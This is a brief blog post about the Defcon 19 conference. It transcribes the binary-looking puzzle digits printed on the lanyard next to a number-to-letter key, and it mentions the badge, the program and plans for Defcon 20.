47 U
56 Y
58 K
62 R
64 I
69 S
73 V
78 X
80 P
84 L
89 Q
94 M
99 H
104 T
? Z

Defcon 19 Lanyard

Here it is folks. Yes, it looks binary.... is it. There is a 7 and 5 at the bottom line.

Top Row (Beginning from Rotary Dial Side)

1110110000[logo]01
0[logo]11010010100
0110[logo]10010011
1111000[logo]00100
11[logo]1101101000
[logo]101010010000
111[logo]000100001
01101001010[logo]1
001010010[logo]011
0010100[logo]10100
011010[logo]

Bottom Row (Beginning from Rotary Dial Side)
010011
11100[logo]0000101
001010010100[logo]
111010010[logo]100
01001001[logo]0101

1010100010001.111010000000o.0010100100115.1111000000107.000000000000.000000000000.000000000000

2011-08-05

Defcon 19 Tools of the trade.

The program, the CD and the badge. It was said that they made 10,000 badges this year, and they still ran out. So my plan for next year is to be in Las Vegas on Wednesday night. Let's go Defcon 20!